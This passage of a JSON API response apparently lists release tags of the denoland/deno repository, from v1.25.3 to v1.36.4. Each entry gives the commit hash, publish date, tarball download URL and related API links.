o/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/